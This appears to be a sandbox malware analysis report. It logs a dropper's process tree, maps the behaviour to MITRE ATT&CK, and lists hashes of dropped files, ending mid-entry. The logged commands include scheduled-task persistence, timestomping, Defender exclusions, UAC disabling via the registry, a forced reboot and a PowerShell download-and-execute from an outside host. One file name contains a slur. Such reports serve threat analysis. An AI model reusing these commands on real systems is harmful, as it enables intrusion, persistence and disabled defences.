C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
4⤵
- Creates scheduled task(s)
PID:7744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name CreationTime -Value \"06/13/2022 3:16 PM\""
3⤵
PID:5236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastWriteTime -Value \"06/13/2022 3:16 PM\""
3⤵
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastAccessTime -Value \"06/13/2022 3:16 PM\""
3⤵
PID:1588

C:\Users\Admin\AppData\Local\Temp\7968320020\aaa1.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\aaa1.exe"
2⤵
PID:3872

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:5824

C:\Users\Admin\AppData\Local\Temp\7968320020\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\crypted.exe"
2⤵
PID:5612

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:5836

C:\Users\Admin\AppData\Local\Temp\7968320020\netTime.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\netTime.exe"
2⤵
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
PID:6808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:2160

C:\Users\Admin\AppData\Local\Temp\7968320020\tg.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\tg.exe"
2⤵
PID:6272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:7760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 264
3⤵
- Program crash
PID:8028

C:\Users\Admin\AppData\Local\Temp\7968320020\1.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\1.exe"
2⤵
PID:4228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN Soft /TR C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe"
3⤵
PID:7588

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN Soft /TR C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
4⤵
- Creates scheduled task(s)
PID:6364

C:\Users\Admin\AppData\Local\Temp\7968320020\putty.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\putty.exe"
2⤵
PID:7424

C:\Users\Admin\AppData\Local\Temp\7968320020\v.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\v.exe"
2⤵
PID:7844

C:\Program Files (x86)\Google\Temp\GUME426.tmp\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Temp\GUME426.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty"
3⤵
PID:7124

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
4⤵
PID:8692

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
4⤵
PID:9188

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:8332

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:8320

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:7420

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTZFODgwN0UtMzRCQy00RjJDLTg0OTktNDFDRDdBNTgzNUQyfSIgdXNlcmlkPSJ7QTU1RENDRTAtRjMyRi00QTVELTlCNDMtOTQwOEVGMzIwQ0U4fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0M0NjQ1ODM0LTQ2MDMtNDY0Qi05Q0RGLUYzNjAzQUE2MTI1RX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMjIiIGxhbmc9ImVuIiBicmFuZD0iQ0hCRiIgY2xpZW50PSIiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMTcxOTYiLz48L2FwcD48L3JlcXVlc3Q-
4⤵
PID:1508

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty" /installsource taggedmi /sessionid "{A6E8807E-34BC-4F2C-8499-41CD7A5835D2}"
4⤵
PID:8312

C:\Users\Admin\AppData\Local\Temp\7968320020\INTERNET.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\INTERNET.exe"
2⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\7968320020\mslink1.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\mslink1.exe"
2⤵
PID:5744

C:\Users\Admin\AppData\Local\Temp\7968320020\oceanzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\oceanzx.exe"
2⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\7968320020\oceanzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\oceanzx.exe"
3⤵
PID:3240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 1320
4⤵
- Program crash
PID:9200

C:\Users\Admin\AppData\Local\Temp\7968320020\cc (2).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\cc (2).exe"
2⤵
PID:8264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8264 -s 796
3⤵
- Program crash
PID:7868

C:\Users\Admin\AppData\Local\Temp\7968320020\p0aw25.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\p0aw25.exe"
2⤵
PID:9052

C:\Users\Admin\AppData\Local\Temp\7968320020\clp6.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\clp6.exe"
2⤵
PID:8224

C:\Users\Admin\AppData\Local\Temp\7968320020\redline.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\redline.exe"
2⤵
PID:6400

C:\Users\Admin\AppData\Local\Temp\7968320020\dd4add6r.s6xlt.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\dd4add6r.s6xlt.exe"
2⤵
PID:1368

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:8484

C:\Users\Admin\AppData\Local\Temp\7968320020\Rebcoana.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\Rebcoana.exe"
2⤵
PID:8200

C:\Users\Admin\AppData\Local\Temp\7968320020\BaldiTrojan-x64.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\BaldiTrojan-x64.exe"
2⤵
PID:9076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
3⤵
PID:7752

C:\Baldi\Baldi.exe
C:\Baldi\Baldi.exe
4⤵
PID:7576

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im explorer.exe
5⤵
- Kills process with taskkill
PID:6168

C:\Baldi\DisableUAC.exe
C:\Baldi\DisableUAC.exe
4⤵
PID:5768

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9BED.tmp\9BEE.bat C:\Baldi\DisableUAC.exe"
5⤵
PID:5808

C:\Windows\system32\reg.exe
reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
PID:5912

C:\Windows\system32\shutdown.exe
shutdown -r -t 1 -c "BALDI EVIL..."
6⤵
PID:6316

C:\Users\Admin\AppData\Local\Temp\7968320020\BaldiTrojan-x64 (2).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\BaldiTrojan-x64 (2).exe"
2⤵
PID:8176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
3⤵
PID:8536

C:\Baldi\Baldi.exe
C:\Baldi\Baldi.exe
4⤵
PID:7992

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im explorer.exe
5⤵
- Kills process with taskkill
PID:9112

C:\Baldi\DisableUAC.exe
C:\Baldi\DisableUAC.exe
4⤵
- Executes dropped EXE
PID:4664

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AE6B.tmp\AE6C.bat C:\Baldi\DisableUAC.exe"
5⤵
PID:2376

C:\Windows\system32\reg.exe
reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
PID:8324

C:\Windows\system32\shutdown.exe
shutdown -r -t 1 -c "BALDI EVIL..."
6⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\7968320020\Rebcoana (2).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\Rebcoana (2).exe"
2⤵
PID:8392

C:\Users\Admin\AppData\Local\Temp\7968320020\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\xmrig.exe"
2⤵
PID:7444

C:\Users\Admin\AppData\Local\Temp\7968320020\evhic3tm.9uob3.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\evhic3tm.9uob3.exe"
2⤵
PID:6160

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:6172

C:\Users\Admin\AppData\Local\Temp\7968320020\postmon (2).exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\postmon (2).exe"
2⤵
PID:8276

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://slpbridge.com/storage/images/debug2.ps1')"
3⤵
PID:6232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://slpbridge.com/storage/images/debug2.ps1')
4⤵
PID:8628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\7968320020\postmon (2).exe" >> NUL
3⤵
PID:624

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:636

C:\Users\Admin\AppData\Local\Temp\7968320020\a02.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\a02.exe"
2⤵
PID:8504

C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
3⤵
PID:5812

C:\Users\Admin\AppData\Local\Temp\7968320020\ss49.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\ss49.exe"
2⤵
PID:7552

C:\Users\Admin\AppData\Local\Temp\7968320020\kellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\kellyzx.exe"
2⤵
PID:5608

C:\Users\Admin\AppData\Local\Temp\7968320020\kellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\kellyzx.exe"
3⤵
PID:6876

C:\Users\Admin\AppData\Local\Temp\7968320020\botminhok.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\botminhok.exe"
2⤵
PID:7720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7720 -s 956
3⤵
- Program crash
PID:7076

C:\Users\Admin\AppData\Local\Temp\7968320020\nigguy_1.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\nigguy_1.exe"
2⤵
PID:5420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcgBxACMAPgA="
3⤵
PID:3616

C:\Users\Admin\AppData\Roaming\nig_guy1.exe
"C:\Users\Admin\AppData\Roaming\nig_guy1.exe"
3⤵
PID:5724

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5724 -s 780
4⤵
- Program crash
PID:7644

C:\Users\Admin\AppData\Local\Temp\stlr.exe
"C:\Users\Admin\AppData\Local\Temp\stlr.exe"
3⤵
PID:884

C:\Users\Admin\AppData\Local\Temp\7968320020\donpyzx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\donpyzx.exe"
2⤵
PID:8936

C:\Users\Admin\AppData\Local\Temp\7968320020\kakazx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\kakazx.exe"
2⤵
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 828
3⤵
- Program crash
PID:1976

C:\Users\Admin\AppData\Local\Temp\7968320020\work.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\work.exe"
2⤵
PID:7296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7296 -s 248
3⤵
- Program crash
PID:4668

C:\Users\Admin\AppData\Local\Temp\7968320020\1232.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\1232.exe"
2⤵
PID:6188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 800
3⤵
- Program crash
PID:4484

C:\Users\Admin\AppData\Local\Temp\7968320020\Sniepriu.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\Sniepriu.exe"
2⤵
PID:5636

C:\Users\Admin\AppData\Local\Temp\7968320020\obizx.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\obizx.exe"
2⤵
PID:6480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 412 -ip 412
1⤵
PID:4308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4472 -ip 4472
1⤵
PID:2432

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:4864

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4864 -s 476
2⤵
- Program crash
PID:5984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2272 -ip 2272
1⤵
PID:4768

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:5588

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5588 -s 2496
2⤵
- Program crash
PID:5824

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 4864 -ip 4864
1⤵
PID:5596

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 436 -p 5588 -ip 5588
1⤵
PID:5728

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:5712

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:7316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6272 -ip 6272
1⤵
PID:7372

C:\Windows\system32\utilman.exe
utilman.exe /debug
1⤵
PID:7200

C:\Windows\System32\ATBroker.exe
C:\Windows\System32\ATBroker.exe /start magnifierpane
2⤵
PID:6584

C:\Windows\System32\Magnify.exe
"C:\Windows\System32\Magnify.exe"
3⤵
PID:5948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:8816

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:9204

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 8076 -ip 8076
1⤵
PID:7992

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:8592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 8264 -ip 8264
1⤵
PID:7460

C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
1⤵
PID:9144

C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
1⤵
PID:7108

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
1⤵
PID:3420

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{60A90A2F-858D-42AF-8929-82BE9D99E8A1}
1⤵
PID:6724

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 484 -p 7808 -ip 7808
1⤵
PID:2204

C:\Windows\system32\utilman.exe
utilman.exe /debug
1⤵
PID:9168

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 5724 -ip 5724
1⤵
PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7720 -ip 7720
1⤵
PID:3520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 7296 -ip 7296
1⤵
PID:3420

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 64 -ip 64
1⤵
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6188 -ip 6188
1⤵
PID:8428

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:9148

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38a0855 /state1:0x41c64e6d
1⤵
PID:7224

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
1⤵
PID:1508

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Filesize
152KB

MD5
e4bf1e4d8477fbf8411e274f95a0d528

SHA1
a3ff668cbc56d22fb3b258fabff26bac74a27e21

SHA256
62f622b022d4d8a52baf02bcf0c163f6fd046265cc4553d2a8b267f8eded4b76

SHA512
429d99fc7578d07c02b69e6daf7d020cff9baa0098fbd15f05539cb3b78c3ac4a368dee500c4d14b804d383767a7d5e8154e61d4ab002d610abed4d647e14c70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ga.exe.log
Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\k3926395.exe.log
Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hkcmd (4).exe.log
Filesize
1KB

MD5
8ec831f3e3a3f77e4a7b9cd32b48384c

SHA1
d83f09fd87c5bd86e045873c231c14836e76a05c

SHA256
7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

SHA512
26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000022001\postmon.exe
Filesize
243KB

MD5
9e8b9b95c84044b1f1e96d017570d3c4

SHA1
5971a7d193b1a8a8061e82d2496c83b7d2b031cd

SHA256
b50ffe8666a1321a877509fb8347cbdd729efc9dc687ce48d2d989ea0ac3d913

SHA512
17663acf6b1cc8e59559cc42326c5028d76016f7f128fd0cda399fe30dce8c118c338012a6932d0312d8612f09f2efd3092bf2a508e2ecd18b3856e4dcb9389e

Download Submit
C:\Users\Admin\AppData\Local\Temp\529757233348
Filesize
52KB

MD5
6d0ca1f4dc97df8d6a13c41ae70c9cab

SHA1
955d1de80b5c5ad3381b678216d0dd1fd6f2b20a

SHA256
a31aba70972e0946ae1d8af26114c5628033410e4702e6840c3d1920274da4d5

SHA512
5762779cfe23e0397cb969926ae251274ba2ffd8246b90a720c85b212f8a36ddd95382f56550aa47b45d594b3d5b7ff5b11c61ced59b2fc6c3bbe147aab35440

Download Submit
C:\Users\Admin\AppData\Local\Temp\7968320020\1.exe
Filesize
4.3MB

MD5
3f005ce85f08a09e93679254e35df782

SHA1
e0ac1e6e68a1a79edd16215447a6c8c3ab068b5d

SHA256
c43f913e75a18bcddedf040beec903b94336734537ca6816d8174e8237822870

SHA512
cbfafb5a2422f2c5488915d30908f37f9a152e1901d53ce2b11542fefce754c141eef46d2d9e52ddc27b9f6ec34b0d6d2c56f3c08532a8ee9636804554c80db1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7968320020\1232.exe
Filesize
827KB

MD5
a1ce7b26712e1db177d86fa87d09c354

SHA1
23d567e5ee4d4bf882f5d4ebe54643eecd921ef4

SHA256
b6b0ac3d7e4ef3a97fb470b38e53f3d8114b736b60408d9828cd5f81e2d7cf0e

SHA512
e5d5c4770131274c28dab0adbac3ed84395aca30a8c15f7004cd4d28ae503c507dacb432dcce65b2f004711837b3cd7a26766b028957aa3a8bc2d99f9dd849d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7968320020\141.exe
Filesize
533KB

MD5
6bb40ed95f770955ea7cf27e4785612e

SHA1
db93260f6bdeb2321fd73019af3d6182c97fd2c5

SHA256
f8ef3e3b18e72eebb4b18edbc90f7f5851ab0af044473fa2856fc974f0c33d6c

SHA512
e97a8aa76ebc4e473323cc8e7413fa8536ea57986f1fd4a45ec39bf3c86a817852fa2d9531c1bb622d0611d26e7afb970da9833220fc12b3170417718a1e12aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7968320020\2.exe
Filesize
480KB

MD5
c2844819d04eb1263b6e683e5548ed0b

SHA1
89ea1c0a657aab655a05766ac79b571f525a1e2e

SHA256
2a41f1caecf36b38f3d033f3887382cefe386a2f684b223e25c396b69633bef2

SHA512
95457f514e3ce0c6dc180f8d6e0930d2d2dc2d816df71077c30d1aa22333e5deac51c409a9f446816e4495227193487dde50533ae35f9a06fa2f770b454024ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\7968320020\2.exe
Filesize
480KB

MD5
c2844819d04eb1263b6e683e5548ed0b

SHA1
89ea1c0a657aab655a05766ac79b571f525a1e2e

SHA256
2a41f1caecf36b38f3d033f3887382cefe386a2f684b223e25c396b69633bef2

SHA512
95457f514e3ce0c6dc180f8d6e0930d2d2dc2d816df71077c30d1aa22333e5deac51c409a9f446816e4495227193487dde50533ae35f9a06fa2f770b454024ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\7968320020\2.exe
Filesize
480KB

MD5
c2844819d04eb1263b6e683e5548ed0b

SHA1
89ea1c0a657aab655a05766ac79b571f525a1e2e

SHA256
2a41f1caecf36b38f3d033f3887382cefe386a2f684b223e25c396b69633bef2

SHA512
95457f514e3ce0c6dc180f8d6e0930d2d2dc2d816df71077c30d1aa22333e5deac51c409a9f446816e4495227193487dde50533ae35f9a06fa2f770b454024ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\7968320020\ARR.exe
Filesize
171KB

MD5
87bf7cbcaad9c9d42226765a9a00123b

SHA1
47f672dc1112ff2ddd32b7bf69aa66725e04a0ca

SHA256
e4e48fd7e9b03db186315f6afa59deb72c2d8d741bc1411bd4a11b73bd2b8371

SHA512
ea491a62cac018acbc274f7c0647fe8a14ac1bcd8ecfd73e3bdacea9cffb785c534991a42b0d8d17e72e9784c0eaac5090202a8f741b5333347b4f776a7605cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7968320020\BaldiTrojan-x64.exe
Filesize
4.2MB

MD5
